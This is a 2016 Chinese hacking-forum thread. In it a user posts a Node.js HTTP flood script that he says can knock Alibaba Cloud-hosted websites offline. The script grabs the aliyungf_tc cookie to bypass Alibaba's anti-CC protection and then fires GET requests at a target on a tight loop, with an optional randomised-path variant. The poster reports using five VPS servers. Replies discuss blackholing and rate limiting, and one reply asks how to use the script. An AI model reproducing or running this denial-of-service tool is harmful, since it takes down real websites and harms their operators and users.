不良人 发表于 2016-1-10 00:16:24

一个脚本能打死阿里云

   之前在公司上班没事,学习nodejs ,可以说压力山大,因学的 建筑工程技术 毕业,转行做互联网安全,对于我这种小白,哎!!
   本脚本 需要 nodejs 脚本代码 VPS 服务器 。当时我采用了5台服务器 基本上,能打死。。。。

   虽然有cookie 验证机制,照样能绕过。。
PS:本人小白,大牛勿喷!!贴代码 。睡觉
代码截图:



/*
By:不良人
*/

console.log('Hello world');//请无视输出!
var http = require('http');
var complete = 0;
var atkCount = 20;
function getCookie() {
    var options = {
      hostname: '对方域名或者IP', //仅限制网站
      port: 80, //默认80端口
      path: '这个我就不用说了吧!',
      agent: false,
      Conntion: 'Keep-Alive'
    };
    http.get(options, function (res) {
      console.log("Got response: " + res.statusCode);
      //   console.log(res.headers['set-cookie']);
      var src = res.headers['set-cookie'];
      var s1 = '=';
      var start = src.indexOf(s1);
      var end = src.indexOf(";");
      var cookie = src.substring(start + 1, end);
      //    console.log(src);
      //    console.log(cookie);
      getData(cookie);
    }).on('error', function (e) {
      console.log("Got error: " + e.message);
    });
}
function getData(cookie) {
    var hf_key_str = 'hf_skey = 2693953.2693953..1447381409.1.3971aafb8bd532f20976867edde553b2;';//请更改抓包值
    var c1 = 'aliyungf_tc=' + cookie + '; ' + 'HttpOnly;' + hf_key_str + ' path=/;QCLOUD=a';      
    var c2 = 'aliyungf_tc=' + cookie + '; ' + 'HttpOnly;' + ' path=/;QCLOUD=a';
    var options = {
      hostname: '对方域名或者IP',
      port: 80,
      path: '网站路径路径',
      agent: false,
      Conntion: 'Keep-Alive',
      Cookie: c2
    };
    http.get(options, function (res) {
      console.log("Got response: " + res.statusCode);
      if (res.statusCode == 200) {
            complete += 1;
            console.log('complete = ' + complete);
      }
    }).on('error', function (e) {
      console.log("Got error: " + e.message);
    });
    // console.log(cookie);
}
function start() {
    getCookie();
}
/*
setInterval(() => {
    console.log('test');
}, 1000);
*/
function access() {
    var aa = '/index/getBoat/'; //请更改
    aa += Math.random() + '/';
    aa += Math.random() + '/';
    /*
    aa += '13';
    for (var i = 0; i < 9; i++) {
      aa += (Math.random() % 10 );
    }
    */
    aa += '/';
    aa += Math.random() + '/';
    aa += Math.random() + '/';
    aa += Math.random() + '/';
    aa += Math.random() + '/';
    aa += Math.random();
    //var aa = '/index/getPwd/' + Math.random() + '/';
    var options = {
      hostname: '请更改',
      port: 80,
      path: aa,
      agent: false,
      Conntion: 'Keep-Alive'
    };
    http.get(options, function (res) {
      console.log("Got response: " + res.statusCode);
      if (res.statusCode == 200) {
            complete += 1;
            console.log('complete = ' + complete);
      }
    }).on('error', function (e) {
      console.log("Got error: " + e.message);
    });
}
setInterval(function () {
    start();
    //access();
}, 1 / atkCount);

90_ 发表于 2016-1-10 00:45:42

阿里号称5G防护,但实际是打一点过去就会直接进黑洞的

Antergone 发表于 2016-1-10 01:12:47

额,这个怎么说呢,我觉得阿里内网打可能还有效,但是外网直接打,可能并没有什么效果。
很多时候,你的访问频率过高的情况下,直接ban掉你就OK了。
也有很多时候,直接会做熔断器,比如最常用的反复去get restful api。
在SOA架构的时候,很多都会在这里直接做一个熔断,打过来都直接被废弃了,除非你要耗尽硬件资源

HUC-参谋长 发表于 2016-1-10 05:11:13

感谢楼主的分享~

H.U.C—Prince 发表于 2016-1-10 07:04:53

感谢楼主的分享~

fireworld 发表于 2016-1-10 09:19:10

X0chitl 发表于 2016-1-10 09:44:49

关键是怎么使用了???

萱萱 发表于 2016-1-10 18:31:29

额,涨姿势了

不良人 发表于 2016-1-10 22:37:10

90_ 发表于 2016-1-10 00:45
阿里号称5G防护,但实际是打一点过去就会直接进黑洞的

老大,说的没错,可以让对方直接黑洞崩溃!!:lol

不良人 发表于 2016-1-10 22:38:03

Antergone 发表于 2016-1-10 01:12
额,这个怎么说呢,我觉得阿里内网打可能还有效,但是外网直接打,可能并没有什么效果。
很多时候,你的访 ...

这么怎么说呢!等过段时间有钱了,买点服务器,录个教程发给你们!
页: [1] 2 3 4 5 6 7 8 9 10
查看完整版本: 一个脚本能打死阿里云